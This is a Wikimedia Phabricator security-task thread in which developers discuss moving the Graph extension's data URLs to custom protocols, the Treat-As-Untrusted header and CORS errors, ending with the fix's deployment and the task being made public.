Sorry, i didnt read the full context, and didnt see the part about withCredentials being false. My bad for jumping to conclusions

Yurik added a comment.Dec 12 2015, 5:24 AM

@Bawolff, sure, not a problem. Could you check the comment above if we should move ahead with the incomplete solution for the uploads link, while we figure out a more comprehensive way to have an image url?

@Yurik: I was mainly wondering about the need to construct sub-requests based on an earlier data request. Is doesn't sound like this would needed for the use cases you mention.

Yurik added a comment.Dec 12 2015, 6:22 PM

@GWicke, even though in theory it might be possible for the graph to pull data based on other data (e.g. via some dynamic URL construction from user actions), in general there is only a two step process for interactive graphs: 1) pull Vega+d3 libs + pull graph spec, 2) pull any resources that graph spec uses. Also Vega supports data streaming, but that's for a different discussion.

Yurik added a comment.Dec 13 2015, 2:47 AM

Graph will no longer send Treat-As-Untrusted, except when URL matches same-origin policy. Please review https://gerrit.wikimedia.org/r/#/c/258725/

Custom protocol support has been deployed to all wikis, but https is still supported until I migrate the graphs and until I implement protocol support in Graphoid (next few days). To try it out, change graph spec and preview (don't save) it.
For example, change "url" protocol in https://www.mediawiki.org/w/index.php?title=Extension:Graph/pageviews&action=edit from https:// to wikirest:// and preview the result - it should still draw the image.

It seems that either CORs are not correctly configured, or something else is amiss - T122488 has been reported, where a graph uses data from another wiki, and fails.

I tried the new wikiraw URL: wikiraw://www.mediawiki.org/Extension:Graph/data/flights-airport-csv and it also failed (via mw api.php):

XMLHttpRequest cannot load https://www.mediawiki.org/w/api.php?format=json&formatversion=latest&action=query&prop=revisions&rvprop=content&titles=Extension%3AGraph%2Fdata%2Fflights-airport-csv
No 'Access-Control-Allow-Origin' header is present on the requested resource. Origin 'https://hu.wikipedia.org' is therefore not allowed access.

On the other hand, page views graph works fine, even though it makes a request to another domain: https://wikimedia.org/api/rest_v1/metrics/pageviews/per-article/en.wikipedia/all-access/user/Main_Page/daily/2015121722/2015122722

XMLHttpRequest cannot load https://www.mediawiki.org/w/api.php?format=json&formatversion=latest&action=query&prop=revisions&rvprop=content&titles=Extension%3AGraph%2Fdata%2Fflights-airport-csv
No 'Access-Control-Allow-Origin' header is present on the requested resource. Origin 'https://hu.wikipedia.org' is therefore not allowed access.

That would be expected, since you neglected to include the origin parameter. See https://www.mediawiki.org/wiki/Manual:CORS#Description for details. Also see T62835#1794676.

Yurik added a comment.EditedDec 28 2015, 12:18 AM

@Anomie, if I understand correctly, the origin parameter is really only needed for security reasons when credentials are passed. If I pass "treat-as-untrusted" header, shouldn't api also accept the CORS request?

My mistake, treat-as-untrusted will not be passed to non-sameorigin-hosts. Please ignore.

@Anomie, if I understand correctly, the origin parameter is really only needed for security reasons when credentials are passed. If I pass "treat-as-untrusted" header, shouldn't api also accept the CORS request?

That wouldn't be correct even if the header were passed. As mentioned in T62835#1794676 that I linked to, the origin parameter is needed to trigger CORS headers due to concern over all caching otherwise having to vary on the Origin header. But further discussion of that belongs on that task.

Seems like it should work for the usual case. More details in code review.

Yurik added a comment.Dec 28 2015, 4:16 PM

A bit earlier @csteipp and I were discussing the port check - not really an issue in our case. I will submit that patch for SWAT today.

Yurik moved this task from Backlog to Prioritized on the Graphs board.Jan 8 2016, 7:36 AM

@Yurik, have you finished converting all of the http/s graphs, so that protocol can be disabled, and we can close this bug?

Yurik added a comment.Jan 26 2016, 6:48 AM

Not yet, I ran into some problems building a library that works both in nodejs and client side. Should be done shortly.

Yurik added a comment.Feb 5 2016, 5:49 PM

I just merged https://gerrit.wikimedia.org/r/#/c/267016/ - removing http/https from all wikis. Should be on the train next week. Most graphs have already been migrated.

Yurik closed this task as Resolved.Feb 12 2016, 3:14 PM

Closing - no more http(s) except in zero portal (private wiki)

@Anomie, minor snafu and it looks like

is currently deployed (with some rebasing) instead of .

I've deployed the current patch,

20:46 csteipp: deployed updated patch for T98313 to include very headers

demon changed the visibility from "Custom Policy" to "Public (No Login Required)".May 20 2016, 5:27 PM
demon changed the edit policy from "Custom Policy" to "All Users".
demon changed Security from Software security bug to None.
Restricted Application added a subscriber: Malyacko. · View Herald TranscriptMay 20 2016, 5:27 PM